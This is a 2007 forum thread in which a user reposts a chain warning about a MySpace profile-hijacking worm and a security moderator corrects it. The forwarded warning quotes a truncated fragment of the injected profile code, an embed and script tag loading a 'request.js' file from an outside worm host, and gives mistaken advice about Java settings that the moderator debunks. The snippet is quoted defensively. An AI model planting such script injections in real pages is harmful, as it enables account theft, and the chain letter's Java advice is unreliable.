| Author |
Topic: MySpace hijack attemt or sick joke? |
Anders Brundell
From:
Falun, Sweden
|
Posted 11 Jan 2007 1:35 pm |
|
I got this from a friend just minutes ago. Is this a sick joke or a real warning for a real threat?
Anders
====================================
It seems there is another myspace hijack going on. Please take a moment to have a look at your page. Whomever is doing the hacking is changing peoples profiles with things like
".. this bitch! ***Inland_Empire***"
and
"but most of all Raul is my hero, not sammy!" (in my heros)
and
"and of course sexy Raul!" (in the who I'd like to meet)
If any of these (or similar) appear in your profile then your password has been compromised. Before you change your password, first of all have a look in your profile code and remove the mallicious script that will have probably been inserted somewhere. It will be a few lines that read something like
embed enableJSURL="false" enableHREF="false" saveEmbedTags="true" allowScriptAccess="never" allownetworking="internal" allowScriptAccess="never" allownetworking="internal" >.. language="javascript" src="http://angeliceyz00.../worm/request.js">function nothingf(){document.write("...r{}");}..>
Delete this first! (This is the function that the script kiddie is using to capture your passwords!) Once you've deleted this code (or something similar - look for the "request.js" bit) change your password!
PLEASE NOTE! If you visit someone who has this code in their page, there is a chance that you will be re-hijaced! To completely protect yourself set your security settings to 'prompt' for JAVA scripting (Tools-> Internet Options -> Security -> Custom Level -> Scripting of Java Applets)
Please pass this on to all your friends!
Thx |
|
|
|
Wiz Feinberg
From:
Mid-Michigan, USA
|
Posted 11 Jan 2007 3:19 pm
|
|
| Quote: |
| PLEASE NOTE! If you visit someone who has this code in their page, there is a chance that you will be re-hijaced! To completely protect yourself set your security settings to 'prompt' for JAVA scripting (Tools-> Internet Options -> Security -> Custom Level -> Scripting of Java Applets) |
Whomever sent this warning doesn't have the slightest clue about the difference between Java and JavaScript, which are two entirely different things. The script exploit is conducted by embedding hostile JavaScript. It has absolutely nothing to do with the Java programming language. Turning off Java will not protect you from JavaScript exploits, and visa versa.
Keep up to date with Windows Updates, browse with Firefox and/or reduce your browsing account privileges to a Limited or Power User, and you will not be affected by these script kiddie exploits.
_________________
"Wiz" Feinberg, Moderator SGF Computers Forum
Security Consultant
Twitter: @Wizcrafts
Main web pages: Wiztunes Steel Guitar website | Wiz's Security Blog | My Webmaster Services | Wiz's Security Blog |
|
|
|
Anders Brundell
From:
Falun, Sweden
|
Posted 12 Jan 2007 7:00 am Safe for this time
|
|
Good, Wiz - then I'm safe for now! 
The problem is that I know way too little to be able to judge if alarms like this one are relevant or not. |
|
|
|
